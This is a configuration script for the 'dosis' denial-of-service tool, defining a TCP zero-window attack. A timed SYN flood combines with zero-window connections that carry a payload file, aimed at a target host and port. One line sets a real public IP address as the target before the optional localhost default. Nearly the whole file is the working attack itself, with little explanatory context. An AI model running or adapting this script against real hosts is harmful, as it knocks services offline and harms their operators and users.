###############################################################################
# tcpopen.inj
#
# TCP zero window attack.
#
# Configuration:
#  THOST   - target host address
#  TPORT   - target host port
#  SRT     - SYN flood runtime
#  RT      - total runtime (in seconds)
#
#   NOTE: vars declared previously as environment variables won't be
#         overwritten by script values. If you want that values on script take
#         precedence over env vars, remove the preceeding ?.
#
# -----------------------------------------------------------------------------
# dosis - DoS: Internet Sodomizer
#   (C) 2008-2009 Gerardo García Peña <gerardo@kung-foo.net>
#
#   This program is free software; you can redistribute it and/or modify it
#   under the terms of the GNU General Public License as published by the Free
#   Software Foundation; either version 2 of the License, or (at your option)
#   any later version.
#
#   This program is distributed in the hope that it will be useful, but WITHOUT
#   ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
#   FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
#   more details.
#
#   You should have received a copy of the GNU General Public License along
#   with this program; if not, write to the Free Software Foundation, Inc., 51
#   Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
#
###############################################################################

# configuration
THOST="213.96.47.81"
? THOST="127.0.0.1"
? TPORT="80"
? SRT="10.0"
? RT="50.0"

# script
0.0 ON 1 LISTEN
0.0 ON 2 TCP RAW DST $THOST $TPORT FLAGS S PERIODIC [ 0.2 ]
0.0 ON 3 TCP ZWIN DST $THOST $TPORT PAYLOAD FILE("tcpopen.payload")
$SRT OFF 2
$RT OFF *

